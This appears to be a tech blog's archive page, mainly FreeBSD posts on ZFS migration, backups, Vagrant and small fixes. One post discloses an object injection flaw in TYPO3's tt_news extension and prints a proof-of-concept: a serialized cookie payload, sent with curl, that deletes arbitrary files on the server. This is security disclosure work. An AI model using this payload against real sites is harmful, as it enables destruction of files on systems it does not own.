Ruby, C, liquorice

Migrate a FreeBSD Server With a ZFS Root Filesystem

ZFS is one of the best parts of FreeBSD and it is widely used for installations of all size. Since a few years it’s possible to have the complete root fileystem on ZFS. The snapshotting capabilities and the builtin zfs send and zfs recv commands make it easy to transfer a server to another system (given a compatible hardware).

This short guide will show you how to migrate a running FreeBSD installation to another server. It expects that you are somewhat familiar with the shell, FreeBSD and ZFS. If you are having trouble: the man pages for zfs(8) and zpool(8) are excellent.

Preparing the target

First, boot the FreeBSD install cd image on the target machine. Choose shell and start partitioning the disk:

# create a new partitioning scheme
gpart create -s gpt ada0
# add a boot partition
gpart add -b 34 -s 94 -t freebsd-boot ada0
# add the main data partition that will hold the ZFS pool
gpart add -t freebsd-zfs ada0

Repeat the above steps for each hard disk that should be part of the pool. Replace ada0 with your hard disk’s identifier. Now let’s create the pool.

zpool create tank mirror /dev/ada0p2 /dev/ada1p2

This command will create a mirrored pool named tank on two hard disks. Adapt it to your needs.

Sending a snapshot

Now that the pool is available, we can start to transfer it from the source machine. Log into the source machine, create a new snapshot and send it to the target machine:

setenv SNAPSHOT "move-`date +%y-%m-%d`"
# make a new snapshot
zfs snapshot -r tank@$SNAPSHOT
# send the snapshot to the new server
zfs send -vR tank@$SNAPSHOT | ssh <target> zfs recv -F tank

ZFS will now send all snapshots of all filesystems contained in tank to the new machine and print the statistics while the process is running. You can check with zfs iostat 10 on the target to verify that the data is being written.

Bonus: keeping up with changes

Sending the data to the new machine can take some time. If your machine is still actively being used while you send the snapshots, the changes will not make it to the new server. However: it’s easy to make another snapshot and just send a diff. The diff will, of course, be much smaller than the whole snapshot.

zfs snapshot -r tank@$SNAPSHOT-diff1
zfs send -vRi tank@$SNAPSHOT tank@$SNAPSHOT-diff1 | ssh <target> zfs recv -F tank

It may be necessary to repeat the step a few times, depending on the amount of changes and your connection.

Cleaning up

You probably have to make some adaptions on the target before booting into FreeBSD. For me that’s mostly the network settings as my servers have an assigned IP per machine. To do that, mount the freshly copied root filesystem into /mnt and make the changes:

# mount the root filesystem
mount -t zfs tank/root /mnt
# add the bootcode to the MBR
# repeat for all disks
gpart bootcode -b /mnt/boot/pmbr -p /mnt/boot/gptzfsboot -i 1 ada0
# do what you need to do, e.g:
# vi /mnt/etc/rc.conf

After that, clean everything up and reboot.

# umount and export the pool
zfs umount -a
# also set the bootfs, it was not copied with zfs send
zpool set bootfs=tank/root tank
zfs export tank

An exact copy of the source server should boot.

More on Backups

I already wrote something about how I do backups of my important data. However, some things changed and as the article gets quite a lot of traffic, I wanted to give an update on the details.

A major change is that I use BitTorrent Sync only for syncing, not for backups. In fact I don’t use btsync any more but I’ll get to that. While btsync works pretty well to keep data in multiple places up to date, it is simply not designed to do good backups. Of course not — I knew that from the beginning. I thought snapshotting the data in various places would automatically get me nice backups on top of all the syncing. While technically true, restoring data is kind of tedious and there is no easy way to search for older versions of a file. It works, but it’s not really fun at all.

So what is better? Instead of btsync I switched to a newish software called Syncthing to sync regularly accessed/shared files. It is open source, written in Go, therefore relatively easy to deploy and you can host the “announce” server yourself. You’re also required to whitelist any nodes that may access your data which gives me a warm and fuzzy feeling. Although it is not yet 1.0, it already works really, really well. A downside is that there are currently no GUI clients, so you have to look on http://localhost:8080 if your data is in sync.

Arq: the cloud!

Well yeah, I kind of gave up — as my backups would ultimately end up in the cloud (via Amazon Glacier) anyway, I realized that it might be better to just backup to S3 and Glacier with all the meta data in the first place. Arq is an excellent and unobtrusive tool to do regular incremental backups from a Mac to Amazon Glacier. The encryption algorithm is open source so if the software breaks one day and doesn’t get updates you can still access your data. Glacier is so cheap ($0.01 per GB per month) that you don’t really need to worry about the storage cost. The downside is that Glacier needs roughly four hours to deliver a requested file. That’s why I still use Time Machine to do hourly backups — it’s fast. Arq obviously eats a lot of bandwidth, so it’s less usable with a bad internet connection. Another possible problem might be the relatively high CPU usage while doing the backup. It’s one of the few programs that makes the fan of my laptop spin up.


For servers there exist an even simpler tool. Tarsnap is developed by Colin Percival who was the Security Officer of the FreeBSD project. Don’t be intimidated by the old school look of the website. It is made by a nerd for nerds. The website contains more technical information than all of the competitors’ websites combined. I like it.

As the name suggests, Tarsnap is just like tar but instead of writing to files, it writes backups to Amazon S3. Not only that, it does some really cool cryptographic tricks to allow deduplication and heavy compression on your already encrypted data. For example: I backup the whole /usr directory of my personal server with lots of jails. Tarsnap compresses and deduplicates the data so that only 14GB of originally 35GB must be transferred and stored. The storage is notably more expensive (250 picodollars per byte month or $0.25 per GB per month) as it is stored in S3 and not in Glacier. But that also means that there’s no delay for receiving backups.

I use the cron script from Tim Bishop to make daily, weekly and monthly backups. It works so well that I’m tempted to replace Arq with Tarsnap on my workstations. I really like the simplicity and the unixesque feel. At the same time the GUI of Arq is a big plus — you want to see what’s going on on your workstation. Storing that much data on S3 might get expensive pretty soon.

However, how cool is it to do a fully incremental, deduplicated, save, secure, compressed offsite backup with:

# tarsnap -cf mybackup /usr

It just works. You can’t beat that.

You Should Try FreeBSD!

You have probably heard of FreeBSD (or any other BSD). Have you used it? If yes: stop reading right here. If no: read on, maybe you want to try it.

I know plenty of developers who feel very comfortable with Linux (especially Ubuntu is common these days). They have their developer server and probably production server running on Linux. But why Linux and not FreeBSD? There are several reasons, maybe one applies to you.

FreeBSD? What’s that?

To some developers FreeBSD is what Linux is to their parents: maybe they heard about it once but don’t know what exactly it is. Well, FreeBSD is an open source operating system that has its origins in the Berkeley Software Distribution. Because Linux was heavily influenced by BSD, Linux and the BSDs are pretty similar on the surface. When I say surface I mean that lots of commands and directories are the same as on a Linux machine. A really big difference is that FreeBSD is the kernel and userland together. In the Linuxworld however there’s plenty of vendors with distributions and own patchsets that are applied on the Linux kernel. Matthew Fuller wrote an excellent and not too opinionated comparison of FreeBSD and Linux. I highly recommend the read.

My Ubuntu server already works — why bother?

Yes, there are millions of Linux servers out there and they work well. Why would anyone ever look at something different? Never touch a running system, right? Well, first I don’t want you to throw your production boxes out of the window and replace them with FreeBSD servers. Just spin up a VM and install FreeBSD, it’s not that hard. But more importantly it is good to realize that there are more free operating systems out there than you might think. Getting to know them will probably change your perspective. At least that is what happened to me.

Stackoverflow’s answers assume I have apt-get installed

That’s actually true - come across an obscure error message of the calendar server you’re trying to install, google it and find instructions to fix it on Ubuntu/Debian only. If your understanding of the server OS does only allow you to copy/paste random strings from Stackoverflow, you might not really enjoy FreeBSD (or anything besides Ubuntu) — but then, why are you operating a server in the first place?

The good thing is: FreeBSD comes with an excellent handbook. It does not only provide practical advise but also describes the architecture, history and quirks of FreeBSD (and to some extend Unix in general). Even better: once you get the basics it’s really easy to go from there. One of the differences between Linux and the BSDs is that the BSDs are more structured, planned and clear. In contrast Linux is more grown and chaotic, partly because of the design to keep the kernel and userland separately and partly because of the many distributions that all have their own idea of how to do things. That’s not bad in itself (really cool things have developed around it) but sometimes it makes things more complicated than they need to be.

I like to compare FreeBSD to a really tidy room where you can find everything with your eyes closed. Once you know where the closets are, it is easy to just grab what you need, even if you have never touched it before. To give you an example: everything you install that is not part of the so called base system will be installed in /usr/local and only there. And while the basesystem’s configuration resides in /etc, everything you install will be configured in /usr/local/etc. Another good example is the /etc/rc.conf. When you need to configure something regarding the startup (network, services, swap) you can find it here, all in one place in a simple config file.

There is exactly one correct place for a given part of the system — it takes some time to get to know these places. But once you do, everything is exactly where you’d expect it.

Will program xyz work?

Almost certainly everything you use will also work on FreeBSD. Have a look at the ports tree. The ports system lets you install packages easily — it is the package management of FreeBSD. Installing a package is as easy as pkg install <pkgname> and ports makes it really easy to compile a package when the precompiled binary does not fit your needs.

That being said, there are some things that just won’t compile because of a Linux-specific include or something. In those cases it can be sufficient to comment out an include, but you might also need to invest weeks to patch something. However, that rarely happens. Everything in the ports tree (which is a lot) will run just fine out of the box. There are even compatibility packages for Linux binaries.

Is FreeBSD stable?

Yes, it’s rock solid. Many major companies like Google or Netflix use FreeBSD in production. FreeBSD people are conservative when it comes to changes to the system. They really don’t like surprises.

Developing and shipping the kernel and userland together eliminates one big source of errors.

A stable system is good. But are there any extras?

There are many details that are unique to FreeBSD but I’ll highlight two features that are really popular.

Obviously ZFS brings many people to FreeBSD. It is a file system and logical volume manager in one. Some of the really cool features are easy snapshotting (and handling them), storage pools, builtin compression, copy on write, data deduplication and many more. The best part is that it’s really stable plus FreeBSD can boot from ZFS. If you like to have your data in a safe place, you’ll love ZFS.

The other really cool thing that got me into FreeBSD are jails. A jail is a bit like chroot on steroids — and more. In a jail nearly everything looks like a normal installation of FreeBSD, but only processes, files and user accounts inside the jail are visible, although it runs the same kernel as the host system does. Have a wonky Wordpress installation? Put it in a jail and be sure that it won’t take your mail server with it when it gets compromised. Because jails use the same kernel as the host, they’re really lightweight and you can have many of them on one machine. They are like Linux containers but 15 years more stable.

Where to go from here

The FreeBSD website is an excellent resource. If you’re into pragmatic video tutorials: the Vimeo user ‘hukl’ has uploaded a series of videos that show the process from downloading FreeBSD to setting up jails with ZFS. The IRC channel #freebsd on Freenode is a really friendly and helpful place if you have any questions. The best thing to do is to download a FreeBSD image, fire up a VM and play around with it. Maybe you’ll like it as I do. I came for ZFS and stayed for FreeBSD.

Comments Hosted With Disgo

I’m happy to announce that as of now the comments on this blog are hosted by Disgo, a simple comment hosting application written in Go.

The old comments from Disqus were imported with Disgo. Unfortunately Disqus exports the comments already rendered with HTML and Disgo renders the comments on the fly. So I had to remove all existing HTML - in other words: links were not imported.

The good part is: it loads in under 100ms and does not need an iframe or jQuery. Oh and you can host it yourself. Goodbye Disqus!

Object Injection Vulnerability in Tt_news

Disclaimer: I reported this vulnerability on September 12th, 2013 and got a response by September 16th. Nothing happened since. I asked for an update on February 4th and haven’t received a response, yet. Update February 12th: The TYPO3 security team released a security bulletin and a fixed version for the issue. Thanks!

Object Injection

What is object injection and why is it a problem? An object injection vulnerability allows the attacker to instantiate arbitrary objects. Just think of something like this:


If the object you create evals somehing in the constructor __wakeup() or, say, unlinks a file in the destructor, the attacker will be able to make some damage. For more information see the OWASP wiki on ‘PHP Object Injection’.


“tt_news” is the most common extension to display news on a TYPO3-powered website. It can display a category menu, so the user can switch between several news categories. The state gets serialized and then saved in a cookie. In another request, the cookie will be loaded and unserialized. Users send cookies.

// lib/class.tx_ttnews_catmenu.php:337
$this->stored = unserialize($_COOKIE[$this->treeName]);

Affected is tt_news >= 3.0.0.


Store the data in a session instead. Note that only sites that display the CATMENU plugin are affected.


  1. Load Swift_ByteStream_TemporaryFileByteStream
  2. Set path to delete
  3. ????
  4. Profit
if (!isset($argv[1]) || !isset($argv[2])) die('usage:' . $argv[0] . " <news_url> <file_to_delete>\n");

// load the typo3 mailer. it will include swift
// the Swift_ByteStream_TemporaryFileByteStream will unlink $this->_path in the destructor
$payload = 'a:2:{i:500;O:26:"TYPO3\CMS\Core\Mail\Mailer":0:{}i:501;O:40:"Swift_ByteStream'.
'_TemporaryFileByteStream":1:{s:38:"' ."\0" . 'Swift_ByteStream_FileByteStream' . "\0".
'_path";s:' . strlen($argv[2]) . ':"'. $argv[2] .'";}}}';

$c = curl_init(); 
curl_setopt($c, CURLOPT_URL, $argv[1] . '?no_cache=1'); 
curl_setopt($c, CURLOPT_COOKIE, 'ttnewscat=' . urlencode($payload));

After a bit of experimenting I was able to write arbitrary files to disk.

Responsible Disclosure

It was the first time I approached a major open source project with a (rather small) vulnerability. I chose responsible disclosure because I see no point in unnecessarily harming anyone. However, although this extension is not part of the core CMS and not that many instances may be affected by this particular bug, it’s still a widely spread extension and you can download it from the official TYPO3 website (like any other extension, too). The project encourages you to disclose security bugs in extensions to the security team. I’m a bit disappointed about the whole experience. I recently found a major bug in the CMS core itself and a working exploit is almost ready, but I’m not sure anymore if I want to go down the responsible disclosure road again.

How I Backup

The day you lose important data due to a head crash of your hard disk, you start getting a little paranoid about backups. It’s not only important to have backups at all, they should also be the right ones. After some experimenting I’ve found a setup that works for my needs. So here’s how I backup my workstations and servers.


I use Macs and therefore OS X. The obvious choice here is OS X’s build-in mechanism: Time Machine. Although it has its quirks and the data format is proprietary, I do like it for two reasons:

  • it’s built-in and simple to use. Need an older version of a file? Just open Time Machine, scroll through the versions, restore it and you’re good.
  • since OS X 10.8 it can do seamingless backups to multiple destinations

One destination is a firewire drive that’s attached to the workstation, the second is a NAS, running FreeBSD with netatalk. The notebook only backups to the NAS (OS X makes local “backups” when I’m on the go and syncs these when I’m back home). That covers many of the “duh, I deleted a random file”-cases. Handy and fast.

However, if both Macs light up in a fire and I had to use a Linux system, I’d have trouble accessing the data, since the format is proprietary. So I need a way to access really important data quickly. Bonus points if the data is accessible from anywhere in the world. Of course, simply rsyncing them once in a while works well — even incremental — and I did that for some time. But it gets messy when more than two computers are involved. What if there was a software that solves the syncing problem and the backup problem at once?

I wrote about BitTorrent Sync with EncFS already. In short it uses the BitTorrent protocol to securely sync files between N computers. Your personal Dropbox. You can even generate “read-only tokens” that allow read-only access for a client. Important documents reside inside an EncFS container, the resulting (encryted) files are shared via BitTorrent and mounted automatically with a little help from the OS X Keychain on the workstation/laptop. The neat part is that I can just spin up a BitTorrent Sync client anywhere in the world and — given the correct 20 byte token — it will magically sync the data. Additional clients run on the NAS and on a root server. So there exist 3 copies of a file seconds after it is created. Once my parents get faster internet connectivity I’ll hide a Raspberry Pi at their home, too, making it 4 copies. The root server will take hourly/daily/weekly/monthly snapshots of these files. See below.

As a software developer I create source code. I put everything with more than one file in a git repository that I will push to the root server.

Where possible I exclude everything from the backup that can be downloaded from the internet, like software, music, movies, etc.


Since current servers are really powerful and oversized for most of my tasks, I have all tasks running as jails on a FreeBSD server. The server uses ZFS which has some really nice features. One of these features is easy snapshotting. The server takes snapshots of the filesystem, keeping:

  • hourly snapshots for the last 6 hours
  • daily snapshots for the last 6 days
  • weekly snapshots for the last 4 weeks
  • monthly snapshots for the last 4 months

And it doesn’t only do that for the root filesystem but individually for each jail, making a rollback really easy. One of the jails is running btsync and stores a copy of the data from the Macs I mentioned earlier. The ZFS pool is mirrored on two hard disks, usual for servers.

ZFS provides a nice command, zfs send, that simply sends a snapshot to stdout. I use zfs send | gzip | openssl -e ... > /my/snapshot.gz.enc to create encrypted files of the monthly snapshots and the incremental daily diffs. Those files are shared via btsync (yes, I love that tool). Currently only the NAS at home syncs these snapshots. They are additionally sent to Amazon Glacier monthly as the last resort. I hope I’ll never have to use it.

Vagrant With FreeBSD as Guest OS (Update)

When you’re working with Vagrant and your production servers are running FreeBSD, chances are that you also want to use FreeBSD as the Vagrant guest OS so the behaviour is consistent. The combination will not work out-of-the-box because FreeBSD doesn’t support the standard synced folder method Vagrant uses. So you need to switch to NFS sharing which needs a host-only (:private_network) network. Once you enable that, Vagrant cannot connect anymore to the virtual machine over SSH and it will look as if the machine halted.

See update below! There is a nice workaround to use two virtual network interfaces. Here is a minimal Vagrantfile that works with FreeBSD 9.1:

Vagrant.configure("2") do |config| = "freebsd91"
  config.vm.box_url = ""

  # Private network for NFS :private_network, ip: ""

  # configure the NICs
  config.vm.provider :virtualbox do |vb|
    vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
    vb.customize ["modifyvm", :id, "--nictype2", "virtio"]
  # use NFS for the synced folder
  config.vm.synced_folder ".", "/vagrant", :nfs => true

Update October 26, 2013

Petar Radošević published a FreeBSD 9.2 base box for Virtual Box with a nice, optimized Vagrantfile. The repository also includes a very handy guide on how to build your own Virtual Box image from the FreeBSD ISO.

Devise SSL Error on FreeBSD

Using Devise to authenticate users with OAuth and Facebook I was having a problem with SSL. I got a verification error:

SSL_connect returned=1 errno=0 state=SSLv3 read server certificate B: certificate verify failed

There’s lots of advice on how to fix the certificate verification error on Windows and Linux systems. However, providing a :ca_path doesn’t work on FreeBSD as the certificates are located in one file. You need to specify :ca_file in your config/initializers/devise.rb instead:

config.omniauth :facebook,
    client_options: {
    ssl: { ca_file: '/usr/local/share/certs/ca-root-nss.crt' }

(De)activate Ipv6 on OS X

Ipv6 works pretty well and more content is availible every day. Still, sometimes you want to deactivate it completely - for me my SixXS was dropping too many packets, so I temporarily wanted ipv4 only. On OS X it’s easy to deactivate ipv6.

First, find your network device:

$ networksetup -listallnetworkservices
An asterisk (*) denotes that a network service is disabled.
Bluetooth DUN
iPhone USB
Bluetooth PAN

Then deactivate ipv6 on that device:

$ networksetup -setv6off <your_device>
# e.g.
$ networksetup -setv6off Wi-Fi

To reactivate, simply use:

$ networksetup -setv6automatic <your_device>

UIScrollView Won’t Scroll on iOS 6

Today I was working on an iOS App for the first time in one or two years. When adding a UIScrollView I came across a problem that it wouldn’t allow me to scroll, even though I set the contentSize properly.

The solution is simple. Since Xcode 4.3 “Auto Layout” is switched on by default which prevents UIScrollView from scrolling. Rather than setting the the contentSize in viewDidLoad, simply set it in viewDidAppear.

- (void)viewDidAppear:(BOOL)animated
    [super viewDidAppear:animated];
    self.scrollView.contentSize = CGSizeMake(320, 1000);